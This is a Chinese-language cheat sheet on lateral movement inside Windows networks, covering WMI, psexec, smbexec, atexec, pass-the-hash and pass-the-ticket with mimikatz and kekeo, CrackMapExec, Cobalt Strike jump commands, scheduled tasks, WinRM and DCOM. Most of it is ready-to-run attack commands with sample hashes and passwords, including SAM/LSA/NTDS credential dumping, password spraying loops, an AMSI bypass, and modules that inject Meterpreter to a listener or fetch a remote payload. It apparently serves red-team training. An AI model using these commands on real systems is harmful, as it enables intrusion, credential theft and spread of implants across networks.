內(nèi)網(wǎng)

內(nèi)網(wǎng)指的是內(nèi)部局域網(wǎng)，常說的LAN（local area network）。常見家庭wifi網(wǎng)絡(luò)和小型的企業(yè)網(wǎng)絡(luò)，通常內(nèi)部計算機(jī)直接訪問路由器設(shè)備，路由器設(shè)備接入移動電信的光纖實(shí)現(xiàn)上網(wǎng)。

內(nèi)部局域網(wǎng)可以通過交換機(jī)/防火墻組成多個網(wǎng)絡(luò)（局域），多個局域之間進(jìn)行訪問控制。新概念（安全域）。

如專門存放服務(wù)器的統(tǒng)稱為DMZ（非軍事化區(qū)域），運(yùn)維區(qū)，內(nèi)網(wǎng)辦公區(qū)等，常說的內(nèi)網(wǎng)滲透就是在局域網(wǎng)內(nèi)部滲透，內(nèi)網(wǎng)滲透比較有難度的是域滲透。

KB2871997&KB2928120

微軟在2014年發(fā)布了KB2871997和KB2928120兩個補(bǔ)丁，用來阻止域內(nèi)主機(jī)本地用戶的網(wǎng)絡(luò)登錄，這樣就無法以本地管理員的權(quán)限執(zhí)行wmi、psexec、schtasks、at和文件訪問共享，本地用戶的PTH方式已經(jīng)死掉，然而默認(rèn)的Administrator（SID 500）這個賬戶仍可以進(jìn)行PTH，并且在禁用NTLM的情況下，psexec無法進(jìn)行遠(yuǎn)程連接，但是使用mimikatz可以攻擊成功。

UNC路徑

UNC路徑代表通用命名約定路徑（Universal Naming Convention），它是一種網(wǎng)絡(luò)路徑格式，用于標(biāo)識在網(wǎng)絡(luò)上共享的資源位置。UNC路徑允許您在本地網(wǎng)絡(luò)中訪問遠(yuǎn)程共享。

UNC路徑由兩個反斜杠\，后跟遠(yuǎn)程計算機(jī)的名稱或IP地址、可選的共享名稱、可選的路徑和文件名組成。例如：

\\ComputerName\ShareName\Path\FileName

其中ComputerName是遠(yuǎn)程計算機(jī)的名稱或IP地址，ShareName是共享名稱，在訪問共享時需要使用該名稱，Path是共享文件夾中的路徑，FileName是所需文件的名稱。

WMI

WMI（Windows management instrumentation）可以描述為管理Windows系統(tǒng)的方法和功能，我們可以把它當(dāng)作API來與Win系統(tǒng)進(jìn)行相互交流，WMI在滲透測試中的價值在于它不需要下載和安裝，WMI是Windows系統(tǒng)自帶功能。而且整個運(yùn)行過程都在計算機(jī)內(nèi)存中發(fā)生，不會留下任何痕跡。

135端口

RPC：遠(yuǎn)程過程調(diào)用服務(wù)，WMIC（winsows management instrumentation）用到這個端口。

wmic具體用法如下：

# 打開一個計算器``wmic /node:ip /user:用戶名 /password:密碼 PROCESS call create "calc.exe"` `   ``#無回顯``wmic /node:192.168.1.56 /user:administrator /password:aab+1s PROCESS call create "calc.exe"``wmic /node:192.168.1.56 /user:administrator /password:aab+1s process call create "cmd.exe /c ipconfig >C:\1.txt"

連接報錯如下信息：

ip錯了報如下信息：

密碼填錯報如下信息：

用另一臺計算機(jī)嘗試連接，正常訪問，命令執(zhí)行成功，wmic執(zhí)行后無回顯，需寫入到文本文件中。

WMIEXEC

獲取交互式shell

cscript.exe //nologo wmiexec.vbs /shell 192.168.1.56 administrator aab+1s

執(zhí)行單條命令

cscript.exe //nologo wmiexec.vbs /cmd 192.168.1.56 administrator aab+1s "cmdkey /list"

如上是提供了密碼，如無密碼，可以利用wce的hash注入，然后執(zhí)行wmiexec就可以了。

wce –s 賬號:主機(jī)名或域的名字:LM:NTLM``   ``cscript //nologo wmiexec.vbs /shell 192.168.0.1

如果抓取的LM hash是AAD3開頭的，或者是No Password之類的，計用32個0代替LM hash

wmiexec.exe

wmiexec.exe ./administrator:aab+1s@192.168.1.56 "whoami"

hash傳遞

wmiexec.exe -hashes 00000000000000000000000000000000:04cea78fa35a5be51f4aee6375651e8a WIN-P6KD23KACIJ/Administrator@192.168.10.173 "ipconfig"

https://github.com/rootclay/WMIHACKER/blob/master/README_zh.md

137，138，139端口

137、138為UDP端口，主要用于內(nèi)網(wǎng)傳輸文件，NetBios/SMB服務(wù)的獲取主要是通過139端口。

445端口

共享文件夾、共享打印機(jī)

ipc$

IPC$是共享“命名管道”的資源，為了讓進(jìn)程間通信而開放的命名管道，通過提供可信任的用戶名和口令，連接雙方可以建立安全的通道并以此通道進(jìn)行加密數(shù)據(jù)的交換，從而實(shí)現(xiàn)對遠(yuǎn)程計算機(jī)的訪問，從NT/2000開始使用。

IPC$在同一時間內(nèi)，兩個IP之間只允許建立一個連接。

NT/2000在提供了ipc$功能的同時，在初次安裝系統(tǒng)時還打開了默認(rèn)共享，即所有的邏輯共享(c$,d$,e$……)和系統(tǒng)目錄winnt或管理員目錄(admin$)共享。

net use \\192.168.1.56\c$ "password" /user:"domain\username"``net use \\192.168.1.56\c$ "aab+1s" /user:administrator

另一臺主機(jī)net use遠(yuǎn)程連接

擴(kuò)展語法

net use \\192.168.1.56\c$``   ``# 刪除ipc$連接``net use \\192.168.1.56\ipc$ /del``   ``# 將目標(biāo)磁盤映射到本地``net use z: \\192.168.1.56\c$``   ``# 刪除映射``net use z: /del``   ``# 關(guān)閉共享``net use ipc$ /del

ipc$空連接

橫向滲透SMB（通過445端口）

利用SMB服務(wù)，需要先建立IPC，可以通過hash傳遞來遠(yuǎn)程執(zhí)行，默認(rèn)回來System權(quán)限，需要目標(biāo)防火墻開啟445并允許通過。

psexec

net use \\192.168.1.56\c$ "aab+1s" /user:administrator``   ``PsExec.exe \\192.168.1.56 whoami``   ``.\PsExec.exe -u administrator -p 123456 \\dc01 cmd``   ``# 交互式shell（相同憑證可直接登錄）``psexec -accepteula \\ip -s cmd.exe

執(zhí)行原理

1.通過ipc$連接，釋放psexecsvc.exe到目標(biāo) 2.通過服務(wù)管理SCManager遠(yuǎn)程創(chuàng)建psexecsvc服務(wù)，并啟動服務(wù)。 3.客戶端連接執(zhí)行命令，服務(wù)端啟動相應(yīng)的程序并執(zhí)行回顯數(shù)據(jù)。 4.運(yùn)行完后刪除服務(wù)。這個在windows的日志中有詳細(xì)的記錄，另外psexec在少數(shù)情況下會出現(xiàn)服務(wù)沒刪除成功的bug，所以一般不推薦使用psexec，推薦wmiexec

C:\WINDOWS\Temp\PsExec.exe -accepteula \\192.168.144.155,192.168.144.196 -u administrator -p admin@123 -d -c C:\WINDOWS\Temp\beacon.exe

cs - plugins

選中需橫向的主機(jī)，jump-psexec64

選擇一個認(rèn)證，listen如果可出網(wǎng)，選擇1，內(nèi)網(wǎng)橫向則用smb beacon2。

直接使用命令行。

jump [module] [target] [listener]``jump psexec64 192.168.10.173 local

通過psexec橫向到目標(biāo)機(jī)器，憑證用的是已知憑證去碰撞

此時整體拓?fù)淙缦?#xff0c;是父子關(guān)系，這是因?yàn)橛玫氖莌ttp beacon直接連接teamserver，如果用smb beacon就是link關(guān)系。

換一下smb beacon

主機(jī)ip后面帶有四個圓圈。

smb的箭頭是黃色

https://www.cnblogs.com/sup3rman/p/12381874.html

SMBEXEC

明文傳遞

smbexec.exe administrator:aab+1s@192.168.10.173

hash傳遞

hash傳遞：``smbexec -hashes :$HASH$ admin@192.168.10.173``smbeexec -hashes :$HASH$ domain/admin@192.168.10.173

dump hash

atexec

• 批量

`FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator #批量檢測 IP 對應(yīng)明文 連接` `   ``FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量檢測 IP 對應(yīng)明文 回顯版` `   ``FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami #批量檢測明文對應(yīng) IP 回顯版` `   ``FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami #批量檢測 HASH 對應(yīng) IP 回顯版`  

PTH

域/工作組環(huán)境，內(nèi)存中存在和當(dāng)前機(jī)器相同的密碼，在身份驗(yàn)證過程中，基本過程是從用戶那里收集密碼，然后對其進(jìn)行加密，然后將正確密碼的加密哈希用于將來的身份驗(yàn)證。

初次認(rèn)證后，Windows 將哈希值保存在內(nèi)存中，這樣用戶就不必一次又一次地輸入密碼。

在憑證轉(zhuǎn)儲期間，我們看到我們已經(jīng)提取了大量的哈希值?，F(xiàn)在作為攻擊者，我們不知道密碼。因此，在身份驗(yàn)證期間，我們提供哈希而不是密碼。

Windows比較哈希值并熱烈歡迎攻擊者。簡而言之，這就是 Pass-the-Hash 攻擊。

https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/

mimikatz - PTH

privilege::debug` `sekurlsa::pth /user:Administrator /domain:WIN-P6KD23KACIJ /ntlm:04cea78fa35a5be51f4aee6375651e8a

彈出窗口后，連接共享端口，傳輸文件

# privilege::debug``# sekurlsa::pth /user:Administrator /domain:WIN-P6KD23KACIJ /ntlm:04cea78fa35a5be51f4aee6375651e8a

拷貝文件

參考：內(nèi)網(wǎng)滲透–Hash傳遞攻擊

PTK

需要存在補(bǔ)丁kb2871997

`使用minikatz獲取aes256_hmac：``sekurlsa::ekeys``傳遞連接：sekurlsa::pth /user:mary/domain:hsyy.com/aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b`  

PTT

`實(shí)現(xiàn)步驟：`  `1、生成票據(jù) kekeo “tgt::ask /user:mary /domain:hsyy.com /ntlm:518b98ad4178a53695dc997aa02d455c”`  `2、導(dǎo)入票據(jù) kerberos::ptt [TGT_haha@HSYY.COM_krbtgt](mailto:TGT_haha@HSYY.COM_krbtgt)~hsyy.com@GOD.ORG.kirbi`  `3、查看憑證 klist`  `4、利用 net use 載入 dir \192.168.213.163\c$`  

smbclient

認(rèn)證登錄

• 明文

smbclient -L //192.168.10.173 -U Administrator

• hash

smbclient.exe -hashes 00000000000000000000000000000000:04cea78fa35a5be51f4aee6375651e8a WIN-P6KD23KACIJ/Administrator@192.168.10.173

空會話枚舉

smbclient -N -U "" -L \\192.168.1.214

rpcclient

`# rpcclient -U "" -N 10.10.10.161` `rpcclient $>enumdomusers``   ``# rpcclient -U corp.pentest.lab/administrator 10.10.10.161` 

cme

https://mpgn.gitbook.io/crackmapexec/getting-started/installation/installation-on-windows

執(zhí)行命令

crackmapexec smb 192.168.10.173 -u administrator -H 04cea78fa35a5be51f4aee6375651e8a -x ipconfig

powershell

#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'

bypass ASMI

#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'  --amsi-bypass /path/payload

cme網(wǎng)絡(luò)掃描

crackmapexec smb 10.0.0.0/24

`crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --shares``crackmapexec smb 192.168.10.83 -u airs-win7 -p aab+1s --shares``crackmapexec smb 192.168.10.83 -u airs-win7 -H 04cea78fa35a5be51f4aee6375651e8a --shares` 

枚舉空會話

cme smb 10.10.10.161 -u '' -p ''``cme smb 10.10.10.161 --pass-pol``cme smb 10.10.10.161 --users``cme smb 10.10.10.161 --groups``   ``cme smb 10.10.10.178 -u 'a' -p '' -shares``cme smb 10.10.10.178 -u -p -shares``   ``# 以遞歸方式遍歷所有共享s``crackmapexec smb  -u  -p  -M spider_plus

憑證獲取

crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --sam`  `crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --lsa``crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --ntds``crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --ntds vss

msf反彈shell

枚舉遠(yuǎn)程目標(biāo)上的活動會話

#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions``   ``#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares

密碼噴灑

使用空格指定多個用戶名/密碼

#~ cme smb 192.168.1.101 -u user1 user2 user3 -p Summer18``#~ cme smb 192.168.1.101 -u user1 -p password1 password2 password3

通過文本指定字典

#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18``#~ cme smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt

找到密碼后繼續(xù)爆破

#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18 --continue-on-success``   ``# 一對一爆破``#~ cme smb 192.168.1.101 -u user.txt -p password.txt --no-bruteforce --continue-on-succes

認(rèn)證

• 域

User/Hash

獲取憑證如下：

Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::

#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'``#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'``#~ cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'``#~ cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'

• 本地認(rèn)證

#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth``#~ cme smb 192.168.1.0/24 -u '' -p '' --local-auth``#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' --local-auth``#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' --local-auth``#~ cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth``#~ cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth

爆破結(jié)果后如下：

	SMB         192.168.1.101    445    HOSTNAME          [+] HOSTNAME\Username:Password (Pwn3d!)  

winRM

#~ cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

# use the latest release, CME is now a binary packaged will all its dependencies``root@payload$ wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip``   ``# execute cme (smb, winrm, mssql, ...)``root@payload$ cme smb -L``root@payload$ cme smb -M name_module -o VAR=DATA``root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth``root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares``root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher``root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable``root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443``root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"``root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'``root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz``root@payload$ cme mimikatz --server http --server-port 80

at、schtasks、

• at

windows版本<2012，高版本中使用schtasks命令

at [\computername] [[id] [/delete] | /delete [/yes]]``at [\computername] <time> [/interactive] [/every:date[,...] | /next:date[,...]] <command>

生成smb beacon

上傳smb beacon文件

添加任務(wù)計劃

shell at \\192.168.10.173 10:51 c:\local-smb.exe

已運(yùn)行，無法反彈，smb shell的問題。

換成web beacon，成功反彈。

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/at

• schtasks

windows>=2012

schtasks create

創(chuàng)建任務(wù)對應(yīng)執(zhí)行文件

schtasks /create /sc <scheduletype> /tn <taskname> /tr <taskrun> [/s <computer> [/u [<domain>\]<user> [/p <password>]]] [/ru {[<domain>\]<user> | system}] [/rp <password>] [/mo <modifier>] [/d <day>[,<day>...] | *] [/m <month>[,<month>...]] [/i <idletime>] [/st <starttime>] [/ri <interval>] [{/et <endtime> | /du <duration>} [/k]] [/sd <startdate>] [/ed <enddate>] [/it] [/z] [/f]

schtasks /create /s 192.168.213.163 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\user.bat /F

schtasks run

執(zhí)行文件任務(wù)

schtasks /run /s 192.168.213.163 /tn adduser /i

schtasks delete

刪除執(zhí)行文件任務(wù)

schtasks /delect /s 192.168.213.163 /tn adduser /f

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create

---

sharpwmi

.\sharpwmi.exe login 192.168.10.1/24 administrator aab+1s cmd whoami

cs報錯

[-] Invoke_3 on EntryPoint failed.

nbtscan

通過IP掃描網(wǎng)絡(luò)獲取bios名稱（計算機(jī)名）

bash$ sudo nbtscan -v -s : 192.168.1.0/24

• cs plugin

winRM

WinRM（windows遠(yuǎn)程管理）是WS管理協(xié)議的Microsoft實(shí)現(xiàn)，一種基于標(biāo)準(zhǔn)的SOAP協(xié)議，允許來自不同供應(yīng)商的硬件和操作系統(tǒng)相互操作，能夠?qū)Ρ镜鼗蜻h(yuǎn)程的服務(wù)器進(jìn)行管理，獲得一個類似Telnet的交互式命令行shell，以便降低系統(tǒng)管理員復(fù)雜的操作。

端口： HTTP(5985) HTTPS SOAP（5986）

前提：憑證及權(quán)限

CS中有WinRM模塊。

winrm：x86，通過WinRM來運(yùn)行一個PowerShell腳本 winrm：x64，通過WinRM來運(yùn)行一個PowerShell腳本

進(jìn)入winrm64后，內(nèi)容如下：

前提需要有認(rèn)證，才可以橫向進(jìn)入，此處的認(rèn)證獲取可以通過內(nèi)部撞庫、歷史RDP憑證等方式獲取，內(nèi)部撞庫是拿已知的密碼去嘗試是否有復(fù)用密碼，歷史RDP憑證是如果管理員再內(nèi)網(wǎng)通過3389登錄后且記錄了密碼，可以通過獲取歷史RDP登錄記錄獲取憑證。

如上圖所示，已經(jīng)擁有192.168.1.214的密碼憑證，但不清楚192.168.1.55的憑證，此時可以嘗試使用192.168.1.214的憑證。

監(jiān)聽器和會話按需選擇，會話是當(dāng)前的beacon。

嘗試運(yùn)行，報錯了。

jump winrm64 192.168.1.55 test

查看服務(wù)器端口情況，未開啟5985端口。

可通過winrm命令開啟5985端口，windows server 2008默認(rèn)winrm服務(wù)是啟動的，但端口未開放，需要通過winrm quickconfig -q 或者 winrm qc開啟端口。

• 開啟winRM服務(wù)

重新查看端口開放情況，5985端口已打開。

• 開啟防火墻或關(guān)閉防火墻命令

C:\Windows\system32>netsh advfirewall firewall set rule group="Windows 遠(yuǎn)程管理" new enable=yes

• 使用powershell連接服務(wù)器

需提前開啟信任主機(jī)

PS C:\Users\Administrator> Set-Item wsman:\localhost\Client\TrustedHosts -value 192.168.1.* -Force``# 這個命令需要再客戶端執(zhí)行，而不是再服務(wù)端執(zhí)行``   ``或者用下面的命令``winrm set winrm/config/client @{TrustedHosts="*"}``   ``PS C:\Users\Administrator> Enter-PSSession 192.168.1.55 -Credential administrator

輸入憑證，連接成功。

或者

New-PSSession -ComputerName 192.168.1.55 -Credential (Get-Credential)``Enter-PSSession 1

通過CS操作

beacon> jump winrm64 192.168.1.55 test

成功返回shell

修復(fù)建議：

禁用WinRM

winrm delete winrm/config/listener?IPAdress=*+Transport=HTTP

• ?? windows8、windows10、windows server 2012及以上系統(tǒng)，WinRM服務(wù)默認(rèn)開啟。

evil-winrm

GitHub - Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentesting

WinRS

WinRS(Windows Remote Shell)是一種遠(yuǎn)程管理工具，用于在Windows遠(yuǎn)程服務(wù)器上運(yùn)行命令行命令。WinRS使用WinRM（Windows Remote Management）協(xié)議向遠(yuǎn)程計算機(jī)發(fā)送命令行請求。 WinRS在Windows Server 2008及更高版本的操作系統(tǒng)中預(yù)安裝，并且可以在Windows 7及更高版本的操作系統(tǒng)中啟用。要使用WinRS，您必須在遠(yuǎn)程服務(wù)器上啟用WinRM，并且在本地計算機(jī)上運(yùn)行命令時必須使用管理員權(quán)限。

winrs -r:192.168.1.55 "cmd /c ipconfig"

# 端口復(fù)用下``winrs -r:http://192.168.1.55 -u:administrator -p:aab+1s whoami``winrs -r:http://192.168.1.55 -u:administrator -p:aab+1s cmd

DCOM

DCOM代表分布式組件對象模型（Distributed Component Object Model），它是一種Microsoft的分布式系統(tǒng)服務(wù)。它允許計算機(jī)上的應(yīng)用程序通過網(wǎng)絡(luò)連接和通信。DCOM使開發(fā)人員能夠從遠(yuǎn)程計算機(jī)上執(zhí)行代碼，并使應(yīng)用程序之間的通信更為容易和靈活。

PS C:\Users\Administrator> Get-ChildItem 'registry::HKEY_CLASSES_ROOT\WOW6432Node\CLSID\{49B2791A-B1AE-4C90-9B8E-E860BA07F889}'

PS C:\Users\Administrator> $a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.1.55"))``   ``PS C:\Users\Administrator> $a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c hostname > c:\fromdcom.txt","7")``   ``PS C:\Users\Administrator> Get-Content \\192.168.1.55\c$\fromdcom.txt``WIN-BVVD8VFVMPR

SCShell

GitHub - Mr-Un1k0d3r/SCShell: Fileless lateral movement tool that relies on ChangeServiceConfigA to run command

No445

GitHub - JDArmy/NO445-lateral-movement: command execute without 445 port

數(shù)據(jù)庫命令執(zhí)行

GitHub - 0x727/SqlKnife_0x727: 適合在命令行中使用的輕巧的SQL Server數(shù)據(jù)庫安全檢測工具

參考

https://www.redteam101.tech/offensive-security/lateral-movement/shi-yong-scshell-jin-hang-heng-xiang-yi-dong

https://github.com/BlWasp/CME_cheatSheet

https://mpgn.gitbook.io/crackmapexec/

https://www.hackingarticles.in/lateral-moment-on-active-directory-crackmapexec/

https://www.hackingarticles.in/lateral-movement-over-pass-the-hash/

https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/

http://www.kxsy.work/2022/02/14/nei-wang-shen-tou-zui-shi-yong-de-heng-xiang-yi-dong-zong-jie/

https://www.cnblogs.com/gamewyd/p/6805595.html

https://www.cnblogs.com/zhengna/p/15309006.html

http://k8gege.org/Ladon/WinrmScan.html

https://cloud.tencent.com/developer/article/1937116